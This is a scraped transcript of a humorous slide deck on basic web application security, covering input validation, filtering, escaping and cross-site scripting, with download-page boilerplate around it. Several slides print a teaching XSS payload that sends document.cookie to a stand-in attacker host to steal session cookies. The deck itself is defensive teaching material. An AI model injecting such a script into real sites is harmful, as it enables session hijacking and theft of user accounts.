1 / 76

Basic Web Application Security

Basic Web Application Security. User Input. Kick Your Arse. Three Ways. (All Awesome). Validation. Passive. (No touchy-touchy). This is a Number. 2. This is not a Number. a. This is really not a Number. <script>alert(‘ loldongs ’)</script>. Filtering. Destructive. (One-Way Street).

ella
Télécharger la présentation

Basic Web Application Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Basic WebApplicationSecurity

  2. User Input

  3. Kick Your Arse

  4. Three Ways (All Awesome)

  5. Validation

  6. Passive (No touchy-touchy)

  7. This is a Number. 2

  8. This is not a Number. a

  9. This is really not a Number. <script>alert(‘loldongs’)</script>

  10. Filtering

  11. Destructive (One-Way Street)

  12. Only letting the good stuff in.

  13. or

  14. Keeping out the bad stuff.

  15. What’s the diff? (Bro.)

  16. Both can be error-prone...

  17. What happens when you screw it up? White-Listing  Usability Problems Black-Listing  Security Problems (Always a trade-off.)

  18. Escaping

  19. Transport Point A  Point B

  20. Data will be the same on both sides.

  21. Different Media,Different Escaping

  22. HTML <b>Huh.</b> <p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p> <b>Huh</b>

  23. SQL Sam O’Brien INSERT INTO mah_peeps (name) VALUES (‘Sam O\’Brien‘); 1, Sam O’Brien, 2010-09-02 18:30:00

  24. XSS (Cross-Site Scripting)

  25. SS (XTREME Site Scripting)

  26. Sticking Scripts Where They Don’t Belong. You there, down the back. Stop sniggering.

  27. <script>alert(‘HACKED BY LOLDONGS’)</script> Amateurs!

  28. <script>alert(document.cookie)</script> Hmm.

  29. <script>document.write(‘<img src=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script> Oh shit.

  30. Why is this uncool? (Yeah! Why?)

  31. <script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script> Ooooh shit.

  32. <script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script> Oooooooooooh shit.

  33. <script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script> Oooooooooooooooooh shit.

  34. Why is this really uncool? (Because shut up.)

  35. HTTP Hyper-Text Thingy I-forgot-again

  36. Stateless

  37. No Idea Who You Are.

  38. It can guess.(Badly.) IP Address Browser User-Agent

  39. Sends a cookie with each request. (A basket of goodies that the browser sends faithfully every request.)

  40. The Server puts a unique ID in the basket. PHPSESSID=123your456mum789 __utma=12948.23.4211414.5553 is_a_furry=1

  41. Browser sends the ID every request. PHPSESSID=123your456mum789

  42. <script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script> Look again.

  43. THEY HAVE YOUR COOKIE. Ooooooooooooooooooooooo-

  44. Preventing Shenanigans

  45. HTML Validation Really Hard.

  46. HTML Filtering Still Really Hard. • Use a library, eg. HTML Purifier.

  47. HTML Escaping Dead Easy. Most languages have stuff to handle this, eg. htmlentities(), cgi.escape(), CGI.escape()

  48. How hard is filtering? (It’s just <script>, right?)

More Related